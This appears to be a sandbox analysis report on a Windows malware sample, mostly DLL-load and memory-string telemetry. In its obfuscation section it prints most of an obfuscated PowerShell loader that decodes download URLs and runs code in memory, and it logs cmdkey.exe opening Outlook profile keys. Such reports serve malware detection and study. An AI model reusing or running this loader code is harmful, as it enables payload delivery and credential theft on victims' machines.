          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Section loaded: wininet.dll
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\cmdkey.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: ystem.Core.pdb7y~X source: powershell.exe, 00000006.00000002.2657649363.000000000769A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5A source: powershell.exe, 00000006.00000002.2657649363.00000000075E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GJFjqeGumqI.exe, 0000000B.00000002.3467099503.0000000000C0E000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: cmdkey.pdbGCTL source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000A.00000003.3061903558.0000000021F0C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3059333142.0000000021D5C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.000000000376E000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3168090406.000000000326A000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000003.3170420691.000000000341E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3468299948.00000000035D0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2665678628.0000000008710000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmdkey.pdb source: msiexec.exe, 0000000A.00000003.3126312023.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.3126442250.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000002.3467221616.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';", "0")
          Source: Yara match | File source: 0000000A.00000002.3167965625.00000000054F8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2667645676.000000000A5A8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2667370891.0000000008940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Ddsspiral)$glOBal:TYpeSITUAtIoner = [SYsTEm.TExt.EnCoDINg]::AsCiI.gEtSTrinG($MUSkElmAnd)$glOBAl:OutBId=$tYpESItuatIonER.sUbstRinG($eRHOLDncoNcEIVAblY,$RensekrEMer)<#Etiketteret Usual
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fuldblodsopdrtterne $currachs $Filtypers), (Parachuter @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Accumulable = [AppDomain]::CurrentDomain.GetAssembli
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Flappy)), $Outfeed).DefineDynamicModule($Genskabende, $false).DefineType($liljernes, $canyonens, [System.MulticastDelegate])$Apositia.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Ddsspiral)$glOBal:TYpeSITUAtIoner = [SYsTEm.TExt.EnCoDINg]::AsCiI.gEtSTrinG($MUSkElmAnd)$glOBAl:OutBId=$tYpESItuatIonER.sUbstRinG($eRHOLDncoNcEIVAblY,$RensekrEMer)<#Etiketteret Usual
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC 